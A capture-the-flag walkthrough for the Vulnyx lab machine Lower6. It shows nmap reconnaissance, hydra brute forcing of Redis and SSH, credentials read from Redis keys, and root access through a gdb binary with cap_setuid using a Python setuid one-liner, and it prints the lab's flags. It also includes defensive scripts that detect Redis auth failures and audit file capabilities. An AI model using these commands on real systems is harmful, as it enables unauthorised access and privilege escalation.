Vlx_Lower6

Target machine source: https://vulnyx.com/

Difficulty: Low

I. Information Gathering

1. Host Discovery

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-19 14:31 +0800
Nmap scan report for 192.168.2.1
Host is up (0.00024s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00015s latency).
MAC Address: 08:00:27:A9:B8:16 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.93
Host is up (0.00048s latency).
MAC Address: 08:00:27:B5:B9:DB (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 7.44 seconds

Target IP: 192.168.2.93

2. Port Scanning

(1) Full port scan

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.93
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-19 14:32 +0800
Nmap scan report for 192.168.2.93
Host is up (0.00055s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
6379/tcp open redis
MAC Address: 08:00:27:B5:B9:DB (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 5.31 seconds

Open ports: 22, 6379

(2) Detailed service scan

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p22,6379 192.168.2.93
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-19 14:32 +0800
Nmap scan report for 192.168.2.93
Host is up (0.00087s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u6 (protocol 2.0)
| ssh-hostkey:
| 256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)
|_ 256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)
6379/tcp open redis Redis key-value store
MAC Address: 08:00:27:B5:B9:DB (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.01 seconds

(3) UDP scan

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.93
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-19 14:33 +0800
Nmap scan report for 192.168.2.93
Host is up (0.00098s latency).
Not shown: 99 closed udp ports (port-unreach)
PORT STATE SERVICE
68/udp open|filtered dhcpc
MAC Address: 08:00:27:B5:B9:DB (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 111.46 seconds

II. Redis Service

Connecting to the Redis service shows that a password is required:

┌──(root㉿kali)-[~/miaosec]
└─# redis-cli -h 192.168.2.93
192.168.2.93:6379> INFO
NOAUTH Authentication required.

1. Redis Password Brute Force

Use hydra to brute-force the password:

┌──(root㉿kali)-[/tmp]
└─# hydra -P /usr/share/wordlists/rockyou.txt -t 4 redis://192.168.2.93
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-03-19 14:41:10
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking redis://192.168.2.93:6379/
[STATUS] 2263.00 tries/min, 2263 tries in 00:01h, 14342136 to do in 105:38h, 4 active
[6379][redis] host: 192.168.2.93 password: hellow
[STATUS] attack finished for 192.168.2.93 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-03-19 14:43:11

Password recovered: hellow

Authentication with the password succeeds:

192.168.2.93:6379> AUTH hellow
OK
192.168.2.93:6379> INFO
# Server
redis_version:7.0.15
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:3f20e06e76a2b578
redis_mode:standalone
os:Linux 6.1.0-37-amd64 x86_64
arch_bits:64
monotonic_clock:POSIX clock_gettime
multiplexing_api:epoll
atomicvar_api:c11-builtin
gcc_version:12.2.0
process_id:417
process_supervised:systemd
run_id:5e58fd7a89f3b6ab8d26d5a2c099ec2f6c19ac43
tcp_port:6379
server_time_usec:1773902678057674
uptime_in_seconds:792
uptime_in_days:0
hz:10
configured_hz:10
lru_clock:12294998
executable:/usr/bin/redis-server
config_file:/etc/redis/redis.conf
io_threads_active:0

# Clients
connected_clients:1
cluster_connections:0
maxclients:10000
client_recent_max_input_buffer:20480
client_recent_max_output_buffer:0
blocked_clients:0
tracking_clients:0
clients_in_timeout_table:0

# Memory
used_memory:928072
used_memory_human:906.32K
used_memory_rss:17424384
used_memory_rss_human:16.62M
used_memory_peak:1032224
used_memory_peak_human:1008.03K
used_memory_peak_perc:89.91%
used_memory_overhead:878504
used_memory_startup:876208
used_memory_dataset:49568
used_memory_dataset_perc:95.57%
allocator_allocated:1418536
allocator_active:1773568
allocator_resident:4182016
total_system_memory:1007435776
total_system_memory_human:960.77M
used_memory_lua:31744
used_memory_vm_eval:31744
used_memory_lua_human:31.00K
used_memory_scripts_eval:0
number_of_cached_scripts:0
number_of_functions:0
number_of_libraries:0
used_memory_vm_functions:32768
used_memory_vm_total:64512
used_memory_vm_total_human:63.00K
used_memory_functions:200
used_memory_scripts:200
used_memory_scripts_human:200B
maxmemory:0
maxmemory_human:0B
maxmemory_policy:noeviction
allocator_frag_ratio:1.25
allocator_frag_bytes:355032
allocator_rss_ratio:2.36
allocator_rss_bytes:2408448
rss_overhead_ratio:4.17
rss_overhead_bytes:13242368
mem_fragmentation_ratio:19.25
mem_fragmentation_bytes:16519304
mem_not_counted_for_evict:0
mem_replication_backlog:0
mem_total_replication_buffers:0
mem_clients_slaves:0
mem_clients_normal:1800
mem_cluster_links:0
mem_aof_buffer:0
mem_allocator:jemalloc-5.3.0
active_defrag_running:0
lazyfree_pending_objects:0
lazyfreed_objects:0

# Persistence
loading:0
async_loading:0
current_cow_peak:0
current_cow_size:0
current_cow_size_age:0
current_fork_perc:0.00
current_save_keys_processed:0
current_save_keys_total:0
rdb_changes_since_last_save:0
rdb_bgsave_in_progress:0
rdb_last_save_time:1773901886
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:-1
rdb_current_bgsave_time_sec:-1
rdb_saves:0
rdb_last_cow_size:0
rdb_last_load_keys_expired:0
rdb_last_load_keys_loaded:5
aof_enabled:0
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
aof_rewrites:0
aof_rewrites_consecutive_failures:0
aof_last_write_status:ok
aof_last_cow_size:0
module_fork_in_progress:0
module_fork_last_cow_size:0

# Stats
total_connections_received:11
total_commands_processed:4551
instantaneous_ops_per_sec:0
total_net_input_bytes:123123
total_net_output_bytes:291656
total_net_repl_input_bytes:0
total_net_repl_output_bytes:0
instantaneous_input_kbps:0.00
instantaneous_output_kbps:0.00
instantaneous_input_repl_kbps:0.00
instantaneous_output_repl_kbps:0.00
rejected_connections:0
sync_full:0
sync_partial_ok:0
sync_partial_err:0
expired_keys:0
expired_stale_perc:0.00
expired_time_cap_reached_count:0
expire_cycle_cpu_milliseconds:15
evicted_keys:0
evicted_clients:0
total_eviction_exceeded_time:0
current_eviction_exceeded_time:0
keyspace_hits:0
keyspace_misses:0
pubsub_channels:0
pubsub_patterns:0
pubsubshard_channels:0
latest_fork_usec:0
total_forks:0
migrate_cached_sockets:0
slave_expires_tracked_keys:0
active_defrag_hits:0
active_defrag_misses:0
active_defrag_key_hits:0
active_defrag_key_misses:0
total_active_defrag_time:0
current_active_defrag_time:0
tracking_total_keys:0
tracking_total_items:0
tracking_total_prefixes:0
unexpected_error_replies:0
total_error_replies:4564
dump_payload_sanitizations:0
total_reads_processed:4577
total_writes_processed:4566
io_threaded_reads_processed:0
io_threaded_writes_processed:0
reply_buffer_shrinks:8
reply_buffer_expands:0

# Replication
role:master
connected_slaves:0
master_failover_state:no-failover
master_replid:20e867b689d082238180ad9fd54e6dd997f0e37a
master_replid2:0000000000000000000000000000000000000000
master_repl_offset:0
second_repl_offset:-1
repl_backlog_active:0
repl_backlog_size:1048576
repl_backlog_first_byte_offset:0
repl_backlog_histlen:0

# CPU
used_cpu_sys:1.776994
used_cpu_user:0.829264
used_cpu_sys_children:0.000000
used_cpu_user_children:0.000271
used_cpu_sys_main_thread:1.776380
used_cpu_user_main_thread:0.828977

# Modules

# Errorstats
errorstat_NOAUTH:count=15
errorstat_WRONGPASS:count=4549

# Cluster
cluster_enabled:0

# Keyspace
db0:keys=5,expires=0,avg_ttl=0
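
The INFO output above already records the password-guessing run in its Errorstats section. As an added example (not part of the original write-up), a monitoring check can parse INFO text and alert on those counters; the function names and the threshold are assumptions, and the sample is a constructed excerpt that reuses values from the output above.

```python
import re

# Constructed excerpt of INFO output, reusing values from the session above.
SAMPLE_INFO = """\
# Stats
total_connections_received:11
total_error_replies:4564

# Errorstats
errorstat_NOAUTH:count=15
errorstat_WRONGPASS:count=4549
"""

def parse_info(text):
    """Parse Redis INFO text into {section: {field: value}}."""
    sections, current = {}, None
    for line in map(str.strip, text.splitlines()):
        if line.startswith("#"):
            current = sections.setdefault(line.lstrip("# ").lower(), {})
        elif current is not None and ":" in line:
            key, _, value = line.partition(":")
            current[key] = value
    return sections

def auth_failure_report(text, max_wrongpass=20):
    """Summarise auth errors; counters are cumulative since the last restart."""
    info = parse_info(text)
    errs = {}
    for key, value in info.get("errorstats", {}).items():
        m = re.fullmatch(r"count=(\d+)", value)
        if key.startswith("errorstat_") and m:
            errs[key[len("errorstat_"):]] = int(m.group(1))
    wrongpass = errs.get("WRONGPASS", 0)
    conns = int(info.get("stats", {}).get("total_connections_received", 0) or 0)
    return {
        "wrongpass": wrongpass,
        "noauth": errs.get("NOAUTH", 0),
        "connections": conns,
        # Many failures over few connections: a few clients looping over AUTH.
        "failures_per_connection": round(wrongpass / conns, 1) if conns else 0.0,
        "alert": wrongpass > max_wrongpass,  # max_wrongpass is an assumed threshold
    }

if __name__ == "__main__":
    print(auth_failure_report(SAMPLE_INFO))
```
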

2. Reading Redis Keys

List all keys:

192.168.2.93:6379> KEYS *
1) "key1"
2) "key3"
3) "key4"
4) "key5"
5) "key2"

Read every key:

192.168.2.93:6379> GET key1
"killer:K!ll3R123"
192.168.2.93:6379> GET key2
"ghost:Ghost!Hunter42"
192.168.2.93:6379> GET key3
"snake:Pixel_Sn4ke77"
192.168.2.93:6379> GET key4
"wolf:CyberWolf#21"
192.168.2.93:6379> GET key5
"shadow:ShadowMaze@9"

III. Gaining Access as killer

Use hydra to try the recovered usernames and passwords against SSH:

┌──(root㉿kali)-[/tmp]
└─# hydra -t 4 -L user.txt -P pass.txt ssh://192.168.2.93
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-03-19 14:55:21
[DATA] max 4 tasks per 1 server, overall 4 tasks, 25 login tries (l:5/p:5), ~7 tries per task
[DATA] attacking ssh://192.168.2.93:22/
[22][ssh] host: 192.168.2.93 login: killer password: ShadowMaze@9
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-03-19 14:55:38

Valid login credentials obtained: killer:ShadowMaze@9

Obtain a shell:

┌──(root㉿kali)-[/tmp]
└─# ssh killer@192.168.2.93
killer@192.168.2.93's password:
-bash: warning: setlocale: LC_ALL: cannot change locale (zh_CN.UTF-8)
killer@lower6:~$ id
uid=1000(killer) gid=1000(killer) groups=1000(killer)

IV. Privilege Escalation

Running linpeas.sh shows that /usr/bin/gdb has file capabilities set (cap_setuid=ep):

Files with capabilities (limited to 50):
/usr/bin/ping cap_net_raw=ep
/usr/bin/gdb cap_setuid=ep
killer@lower6:/tmp$ cat /proc/sys/kernel/yama/ptrace_scope
0
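
  • 0: unrestricted → an ordinary user can attach gdb to any process (including setuid programs), allowing privilege escalation
  • 1 (default on Ubuntu/Debian): can attach only to processes it owns → GDB cannot be used directly for privilege escalation
  • 2/3: stricter restrictions

Escalate privileges directly: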

killer@lower6:/tmp$ gdb
GNU gdb (Debian 13.1-3) 13.1
Copyright (C) 2023 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word".
(gdb) python import os; os.setuid(0); os.execl("/bin/sh", "sh", "-p")
# id
uid=0(root) gid=1000(killer) groups=1000(killer)

Or:

killer@lower6:/tmp$ gdb -q --batch -ex 'python import os; os.setuid(0); os.system("/bin/sh")'
# id
uid=0(root) gid=1000(killer) groups=1000(killer)
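
The finding above, cap_setuid on a debugger that embeds a Python interpreter, is something a host audit can catch. As an added example (not part of the original write-up), the script below parses getcap-style output and flags risky capabilities, rating them HIGH on programs that run user-supplied code; the capability list, the program-name list and all but the first two sample lines are assumptions.

```python
import os
import re

# Capabilities that lead to root or bypass file permissions (assumed, not exhaustive).
RISKY_CAPS = {"cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
              "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_chown"}
# Name prefixes of programs that run user-supplied code (assumed list).
CODE_RUNNERS = ("gdb", "python", "perl", "ruby", "node", "php", "lua")
CLAUSE_RE = re.compile(r"(?P<names>[a-z0-9_,]*)[=+](?P<flags>[eip]+)")  # "cap_x=ep"

# First two lines are from the linpeas output above; the rest are constructed.
SAMPLE = """\
/usr/bin/ping cap_net_raw=ep
/usr/bin/gdb cap_setuid=ep
/usr/bin/python3.11 = cap_setuid,cap_net_bind_service+eip
/usr/sbin/backup-agent cap_dac_read_search=ep
/usr/bin/tcpdump cap_net_admin,cap_net_raw=i
"""

def parse_getcap(text):
    """Map each path to the capabilities in its effective or permitted set."""
    result = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 2 or not parts[0].startswith("/"):
            continue
        # Older getcap prints "path = caps", newer prints "path caps".
        clauses = parts[2:] if parts[1] == "=" else parts[1:]
        caps = set()
        for clause in clauses:
            m = CLAUSE_RE.fullmatch(clause)
            if m and set(m["flags"]) & {"e", "p"}:  # inheritable-only grants nothing alone
                caps |= set(m["names"].split(",")) if m["names"] else {"all"}
        if caps:
            result[parts[0]] = caps
    return result

def audit(text):
    """Return sorted (severity, path, risky capabilities) findings."""
    findings = []
    for path, caps in parse_getcap(text).items():
        risky = RISKY_CAPS if "all" in caps else caps & RISKY_CAPS
        if risky:
            runner = os.path.basename(path).startswith(CODE_RUNNERS)
            findings.append(("HIGH" if runner else "REVIEW", path, sorted(risky)))
    return sorted(findings)

if __name__ == "__main__":
    print(audit(SAMPLE))
```

Feed it the output of `getcap -r / 2>/dev/null`; `setcap -r <path>` removes a file capability that is not needed.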

V. Viewing the Flags

# cat /root/root.txt /home/killer/user.txt
03f4adf5855fe3a1e0df4b0c885ec67a
8ec061fc51f064186d2b0661c004be93

Vlx_Lower6
http://miao-sec.github.io/Vulnyx/Vlx-Lower6/
Author: Miao
Published: March 19, 2026
License: BY-MIAO